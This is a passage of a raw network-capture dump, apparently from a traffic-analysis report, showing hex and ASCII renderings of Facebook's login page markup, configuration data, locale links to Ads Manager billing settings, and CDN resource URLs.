                                                                                                                                                                                    2023-01-05 08:00:35 UTC19933INData Raw: 68 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 62 6c 69 74 65 5c 2f 63 6f 6e 66 69 67 5c 2f 22 3a 31 2c 22 5c 2f 68 72 5c 2f 7a 73 68 5c 2f 77 63 5c 2f 22 3a 31 2c 22 5c 2f 61 6a 61 78 5c 2f 62 6f 6f 74 6c 6f 61 64 65 72 2d 65 6e 64 70 6f 69 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 65 64 75 63 61 74 69 6f 6e 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 66 65 61 74 75 72 65 5f 73 77 69 74 63 68 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65
                                                                                                                                                                                    Data Ascii: hp":1,"\/zero\/fblite\/config\/":1,"\/hr\/zsh\/wc\/":1,"\/ajax\/bootloader-endpoint\/":1,"\/mobile\/zero\/carrier_page\/":1,"\/mobile\/zero\/carrier_page\/education_page\/":1,"\/mobile\/zero\/carrier_page\/feature_switch\/":1,"\/mobile\/zero\/carrier_page
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19934INData Raw: 2f 22 3a 31 2c 22 5c 2f 72 65 67 69 73 74 72 61 74 69 6f 6e 5c 2f 6c 6f 67 5c 2f 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 66 31 32 33 5c 2f 22 3a 31 2c 22 5c 2f 65 78 70 65 72 74 5c 2f 22 3a 31 2c 22 5c 2f 65 78 70 65 72 74 73 5c 2f 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 5c 2f 69 6e 64 65 78 2e 70 68 70 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 2e 70 68 70 22 3a 31 2c 22 5c 2f 73 72 72 5c 2f 22 3a 31 2c 22 5c 2f 6d 73 69 74 65 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 66 62 73 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 70 72 65 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6c 69 66 66 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e
                                                                                                                                                                                    Data Ascii: /":1,"\/registration\/log\/":1,"\/terms\/":1,"\/f123\/":1,"\/expert\/":1,"\/experts\/":1,"\/terms\/index.php":1,"\/terms.php":1,"\/srr\/":1,"\/msite\/redirect\/":1,"\/fbs\/pixel\/":1,"\/contactpoint\/preconfirmation\/":1,"\/contactpoint\/cliff\/":1,"\/con
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19935INData Raw: 62 61 63 6b 5f 66 72 6f 6d 5f 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 2c 22 69 6d 70 72 65 73 73 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 5f 66 6c 61 67 22 3a 33 7d 2c 35 32 33 37 5d 2c 5b 22 63 72 3a 36 39 36 37 30 33 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 33 47 51 6a 61 6c 79 2d 52 4a 55 69 69 61 7a 65 47 48 55 4d 51 57 37 4e 71 61 56 51 44 52 6a 32 4d 36 42 67 32 75 75 50 6c 71 6b 4d 55 47 30 52 7a 6b 31 6c 33 71 6f 69 45 7a 53 64 50 51 57 4c 53 31 56 63 65 66 53 32 4c 77 48 56 62 6b 75 64 35 31 71 70 32 37 72 72 73 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 30 38 38 38 36 22 2c 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d
                                                                                                                                                                                    Data Ascii: back_from_immediate":false,"impression_experiment_flag":3},5237],["cr:696703",[],{"__rc":[null,"Aa3GQjaly-RJUiiazeGHUMQW7NqaVQDRj2M6Bg2uuPlqkMUG0Rzk1l3qoiEzSdPQWLS1VcefS2LwHVbkud51qp27rrs"]},-1],["cr:708886",["EventProfilerImpl"],{"__rc":["EventProfilerIm
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19937INData Raw: 6b 4d 55 47 30 52 7a 6b 31 6c 33 71 6f 69 45 7a 53 64 50 51 57 4c 53 31 56 63 65 66 53 32 4c 77 48 56 62 6b 75 64 35 31 71 70 32 37 72 72 73 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 32 35 31 30 30 22 2c 5b 22 52 75 6e 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 42 6c 75 65 22 2c 22 41 61 33 47 51 6a 61 6c 79 2d 52 4a 55 69 69 61 7a 65 47 48 55 4d 51 57 37 4e 71 61 56 51 44 52 6a 32 4d 36 42 67 32 75 75 50 6c 71 6b 4d 55 47 30 52 7a 6b 31 6c 33 71 6f 69 45 7a 53 64 50 51 57 4c 53 31 56 63 65 66 53 32 4c 77 48 56 62 6b 75 64 35 31 71 70 32 37 72 72 73 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 32 39 34 31 34 22 2c 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65
                                                                                                                                                                                    Data Ascii: kMUG0Rzk1l3qoiEzSdPQWLS1VcefS2LwHVbkud51qp27rrs"]},-1],["cr:925100",["RunBlue"],{"__rc":["RunBlue","Aa3GQjaly-RJUiiazeGHUMQW7NqaVQDRj2M6Bg2uuPlqkMUG0Rzk1l3qoiEzSdPQWLS1VcefS2LwHVbkud51qp27rrs"]},-1],["cr:729414",["VisualCompletion"],{"__rc":["VisualComple
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19938INData Raw: 4e 4a 37 49 5f 78 6b 65 4a 67 44 67 5a 7a 61 31 5f 45 48 54 64 48 79 30 6a 69 74 39 37 33 67 75 66 6d 42 39 59 76 41 74 5f 72 58 54 49 47 59 4c 49 74 64 52 53 62 44 36 50 71 65 49 62 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 39 38 34 30 38 31 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 30 54 37 75 70 67 2d 36 54 37 4d 4e 74 64 31 47 63 47 39 65 70 72 56 46 48 78 65 37 44 65 4f 56 57 65 34 59 71 76 63 6f 37 59 57 63 47 38 4e 5a 6e 73 75 34 65 76 47 6b 6e 35 71 43 33 70 68 6e 61 78 45 49 41 52 43 47 32 73 67 39 69 75 4f 72 36 66 52 6d 6e 33 33 58 55 4e 22 5d 7d 2c 2d 31 5d 5d 2c 22 72 65 71 75 69 72 65 22 3a 5b 5b 22 6d 61 72 6b 4a 53 45 6e 61 62 6c 65 64 22 5d 2c 5b 22 6c 6f 77 65 72 44 6f 6d 61 69 6e 22 5d 2c 5b 22 55 52 4c 46 72 61
                                                                                                                                                                                    Data Ascii: NJ7I_xkeJgDgZza1_EHTdHy0jit973gufmB9YvAt_rXTIGYLItdRSbD6PqeIb"]},-1],["cr:1984081",[],{"__rc":[null,"Aa0T7upg-6T7MNtd1GcG9eprVFHxe7DeOVWe4Yqvco7YWcG8NZnsu4evGkn5qC3phnaxEIARCG2sg9iuOr6fRmn33XUN"]},-1]],"require":[["markJSEnabled"],["lowerDomain"],["URLFra
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19940INData Raw: 74 20 6c 6f 67 20 69 6e 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 34 2d 75 32 20 5f 31 77 31 74 20 5f 34 2d 75 38 20 5f 35 32 6a 76 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 75 22 20 69 64 3d 22 68 65 61 64 65 72 5f 62 6c 6f 63 6b 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 39 37 77 31 20 5f 35 30 66 36 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 39 61 78 7a 22 3e 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 3c 2f 64 69 76 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 6f 72 6d 20 69 64 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 22 20 61 63 74 69 6f 6e
                                                                                                                                                                                    Data Ascii: t log in to continue.</div></div></div><div class="_4-u2 _1w1t _4-u8 _52jv"><div class="_xku" id="header_block"><span class="_97w1 _50f6"><div class="_9axz">Log Into Facebook</div></span></div><div class="login_form_container"><form id="login_form" action
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19941INData Raw: 6a 73 22 20 76 61 6c 75 65 3d 22 6e 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20 5f 35 34 36 36 20 5f 34 34 6d 67 22 20 69 64 3d 22 65 6d 61 69 6c 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 74 65 78 74 20 5f 35 35 72 31 20 69 6e 70 75 74 74 65 78 74 20 5f 31 6b 62 74 20 69 6e 70 75 74 74 65 78 74 20 5f 31 6b 62 74 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 20 69 64 3d 22 65 6d 61 69 6c 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 20 6f 72 20 70 68 6f 6e 65 20 6e 75 6d 62 65 72 22 20 76 61 6c 75 65 3d 22 22 20 61 75 74 6f 66 6f 63 75 73 3d 22 31 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d
                                                                                                                                                                                    Data Ascii: js" value="n" /><div class="clearfix _5466 _44mg" id="email_container"><input type="text" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="email" id="email" tabindex="0" placeholder="Email or phone number" value="" autofocus="1" autocomplete=
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19943INData Raw: 63 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 6e 61 6d 65 3d 22 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 6e 61 6d 65 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 6e 61 6d 65 3d 22 66 69 72
                                                                                                                                                                                    Data Ascii: ce" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="fir
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19944INData Raw: 66 6f 6f 74 65 72 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 75 69 4c 69 73 74 20 6c 6f 63 61 6c 65 53 65 6c 65 63 74 6f 72 4c 69 73 74 20 5f 32 70 69 64 20 5f 35 30 39 2d 20 5f 34 6b 69 20 5f 36 2d 68 20 5f 36 2d 6a 20 5f 36 2d 69 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 3c 6c 69 3e 45 6e 67 6c 69 73 68 20 28 55 53 29 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 2d 64 65 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65
                                                                                                                                                                                    Data Ascii: footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_se
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19946INData Raw: 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 32 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 49 74 61 6c 69 61 6e 22 3e 49 74 61 6c 69 61 6e 6f 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 74 2d 70 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70
                                                                                                                                                                                    Data Ascii: 0252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/login.p
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19947INData Raw: 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 65 73 2d 6c 61 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 35 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 70 61 6e 69 73 68 22 3e 45 73 70 61 c3 b1 6f 6c 3c 2f 61
                                                                                                                                                                                    Data Ascii: &quot;https:\/\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Spanish">Espaol</a
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19949INData Raw: 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 68 69 5f 49 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 68 69 2d 69 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74
                                                                                                                                                                                    Data Ascii: ;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_select
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19950INData Raw: 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 2f 22 20 74 69 74 6c 65 3d 22 4c 6f 67 20 69 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 22 3e 4c 6f 67 20 49 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 73 73 65 6e 67 65 72 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 4d 65 73 73 65 6e 67 65 72 2e 22 3e 4d 65 73 73 65 6e 67 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 69 74 65 2f 22 20 74 69 74 6c 65 3d 22 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 20 66 6f 72 20 41 6e 64 72 6f 69 64 2e 22 3e 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b
                                                                                                                                                                                    Data Ascii: ><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19952INData Raw: 69 3e 3c 61 20 68 72 65 66 3d 22 2f 76 6f 74 69 6e 67 69 6e 66 6f 72 6d 61 74 69 6f 6e 63 65 6e 74 65 72 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 63 32 6c 30 5a 51 25 33 44 25 33 44 22 20 74 69 74 6c 65 3d 22 53 65 65 20 74 68 65 20 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 2e 22 3e 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 70 6f 6c 69 63 79 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 68 6f 77 20 77 65 20 63 6f 6c 6c 65 63 74 2c 20 75 73 65 20 61 6e 64 20 73 68 61 72 65 20 69 6e 66 6f 72 6d 61 74
                                                                                                                                                                                    Data Ascii: i><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share informat
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19953INData Raw: 22 20 61 63 63 65 73 73 6b 65 79 3d 22 39 22 20 74 69 74 6c 65 3d 22 52 65 76 69 65 77 20 6f 75 72 20 74 65 72 6d 73 20 61 6e 64 20 70 6f 6c 69 63 69 65 73 2e 22 3e 54 65 72 6d 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 68 65 6c 70 2f 3f 72 65 66 3d 70 66 22 20 61 63 63 65 73 73 6b 65 79 3d 22 30 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 48 65 6c 70 20 43 65 6e 74 65 72 2e 22 3e 48 65 6c 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 65 6c 70 2f 36 33 37 32 30 35 30 32 30 38 37 38 35 30 34 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 43 6f 6e 74 61 63 74 20 55 70 6c 6f 61 64 69 6e 67 20 26 61 6d 70 3b 20 4e 6f 6e 2d 55 73 65 72 73 20 4e 6f 74 69 63 65 2e 22 3e 43 6f 6e 74 61
                                                                                                                                                                                    Data Ascii: " accesskey="9" title="Review our terms and policies.">Terms</a></li><li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></li><li><a href="help/637205020878504" title="Visit our Contact Uploading &amp; Non-Users Notice.">Conta
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19954INData Raw: 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 31 39 4c 73 65 49 47 31 6e 77 71 33 6f 6e 44 38 22 7d 2c 22 31 33 39 39 32 31 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 67 75 43 57 31 65 79 49 6b 4f 56 31 45 4d 67 73 22 7d 2c 22 31 34 30 31 30 36 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 35 61 65 74 4e 35 47 62 33 72 65 49 58 56 75 6a 4d 22 7d 2c 22 31 35 39 36 30 36 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 4a 48 75 44 57 74 61 4f 71 52 75 42 55 45 58 67 22 7d 2c 22 31 37 32 32 30 31 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 5f 4d 35 67 70 63 36 52 4c 72 48
                                                                                                                                                                                    Data Ascii: ult":false,"hash":"AT519LseIG1nwq3onD8"},"1399218":{"result":true,"hash":"AT6guCW1eyIkOV1EMgs"},"1401060":{"result":true,"hash":"AT5aetN5Gb3reIXVujM"},"1596063":{"result":false,"hash":"AT7JHuDWtaOqRuBUEXg"},"1722014":{"result":false,"hash":"AT6_M5gpc6RLrH
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19956INData Raw: 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 65 5c 2f 72 5c 2f 36 7a 6d 68 6d 62 6c 6c 70 57 77 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4d 37 5c 2f 6a 6c 43 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 46 5c 2f 72 5c 2f 50 74 6d 66 78 4c 56 77 41 62 37 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 74 74 58 70 77 70 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70
                                                                                                                                                                                    Data Ascii: :"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ye\/r\/6zmhmbllpWw.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"M7\/jlCR":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/r\/PtmfxLVwAb7.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"ttXpwpR":{"type":"js","src":"http
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19957INData Raw: 22 64 47 65 62 33 7a 49 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 38 4a 46 34 5c 2f 79 36 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 4d 6e 42 39 33 66 31 5f 31 31 4e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 52 35 77 31 72 43 4a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 46 5c 2f 72 5c 2f 70 35 35 48 66 58 57 5f 5f 6d 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63
                                                                                                                                                                                    Data Ascii: "dGeb3zI":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i8JF4\/y6\/l\/en_US\/MnB93f1_11N.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"R5w1rCJ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/r\/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz","nc
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19959INData Raw: 79 4a 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 6c 32 67 55 79 5f 6f 72 78 66 37 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 50 56 73 32 34 4e 41 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 41 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 74 43 6f 36 37 4a 6e 6f 68 34 73 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4f 4b 38 67 5c 2f 69 54 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 